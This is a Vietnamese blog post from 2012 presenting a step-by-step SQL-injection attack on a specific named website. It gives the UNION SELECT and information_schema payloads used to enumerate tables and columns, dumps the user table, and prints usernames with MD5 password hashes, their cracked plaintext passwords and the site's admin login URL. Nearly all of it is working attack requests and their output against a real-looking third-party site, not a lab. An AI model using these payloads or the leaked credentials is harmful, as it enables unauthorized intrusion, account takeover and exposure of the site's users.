Hack Site Lỗi SQL Cơ Bản!

Hướng dẫn hack site: http://thegoidimy.com

Link lỗi: http://thegoidimy.com/news.php?nt=28&nid=133
Kiểm tra link lỗi: http://thegoidimy.com/news.php?nt=28&nid=133
Xuất hiện lỗi: Trang bị thiếu đi một số thông tin

Bước 1: Xác định sô trường cột

+) http://thegoidimy.com/news.php?nt=28&nid=133 order by 15–
Xuất hiện lỗi: Trang bị thiếu thông tin, tiếp tục thử nhé:
+) http://thegoidimy.com/news.php?nt=28&nid=133 order by 9–
Trang hoạt động bình thường, tiếp tục
+)http://thegoidimy.com/news.php?nt=28&nid=133 order by 10–
Trang bị lỗi như cũ, chững tỏ số trường cột bị lỗi là: 10 – 1= 9

Bước 2: Xác Định cột bị lỗi:

+) http://thegoidimy.com/news.php?nt=28&nid=133 union select 1,2,3,4,5,6,7,8,9—
Câu lệnh đúng cả rồi, sao không thấy số mã gì cả, khắc phục: thay: 133 = null
+) http://thegoidimy.com/news.php?nt=28&nid=null union select 1,2,3,4,5,6,7,8,9—
Ah`, đã ra số rồi nhé, số 2 và số 4. Thử xem version nó xem sao:
+ http://thegoidimy.com/news.php?nt=28&nid=null union select 1,version(),3,4,5,6,7,8,9—
Ok, đã xuât hiên version 5. , thế không cần phải đoán tables và columns rồi. Có thể sử dụng unhex(hex(………

Bước 3: Exploit tên tables

+)http://thegoidimy.com/news.php?nt=28&nid=null union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9 from information_schema.tables– –
Đã xuât hiện danh sách các tables:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_

SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,

KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMA_PRIVILEGES,

STATISTICS,,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,

USER_PRIVILEGES,VIEWS,itkg_accessnumber,

itkg_advertising,itkg_chat_lines,itkg_chat_online,

itkg_chat_settings,itkg_chat_users,itkg_comments,

itkg_config_site,itkg_contact,itkg_contact_purpose,

itkg_country,itkg_customer,itkg_customer_support,

itkg_documents,itkg_favorite_list,itkg_flash,

_func,itkg_hotel_booking,itkg_hotel_roomtype,

itkg_intro,itkg_map_district,itkg_music,itkg_musicalbum,

itkg_news,itkg_news_category,itkg_news_feedback,

itkg_news_type,itkg_orders,itkg_orders_details,

itkg_payment,itkg_picturealbum,itkg_picturelib,

itkg_postion,itkg_postion_service,itkg_process,

itkg_products,itkg_products_category,

itkg_products_type,itkg_reports,itkg_role,

itkg_role_func,itkg_rss,itkg_service,

itkg_service_category,itkg_users,

itkg_video,itkg_videoalbum,news_address,

news_category,news_category_description,

Chúng ta chú y đến table có tên là: itkg_users , ta sẽ khai thác column trong table này


Bước 4
: Exploit tên Columns

Lưu ý: +) itkg_users có mã hex là: 69746b675f7573657273
+) link đổi dạng chuỗi sang hex: http://www.string-functions.com/string-hex.aspx
+) “/” có mã hex là : 0x7c
Ok! Chúng ta tiếp tục:

+) http://thegoidimy.com/news.php?nt=28&nid=null union select 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9 from information_schema.columns where table_name=0x69746b675f7573657273—
Các column đã bị lòi ra rối nhé:

username,password,fullname,address,phone,email,promotion_info,

active,active_code,status,lastest_login,

Ta chỉ quan tâm đến 2 columns: username,password là đủ bigsmile


Bước 5
: Get thông tin

+) http://thegoidimy.com/news.php?nt=28&nid=null union select 1,group_concat(username,0x7c,password),3,4,5,6,7,8,9 from itkg_users –
Ok! Đã có thông tin của username và password rồi nhé:

admin|c4ca4238a0b923820dcc509a6f75849b,
manager|1d0258c2440a8d19e716292b231e3190,
user|ee11cbb19052e40b07aac0ca060c23ee

Bước 6: Tìm link admin và giải mã

+) Link admin: http://thegoidimy.com/admin/templates/login.php
+) Giải mã: link crack: http://md5cracker.org/

admin/1
Manager/ manager
User/ user

By: ducdung.08clc

About securityforall

it, smile, share for people,...

Posted on May 7, 2012, in Hack SQL Injection. Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: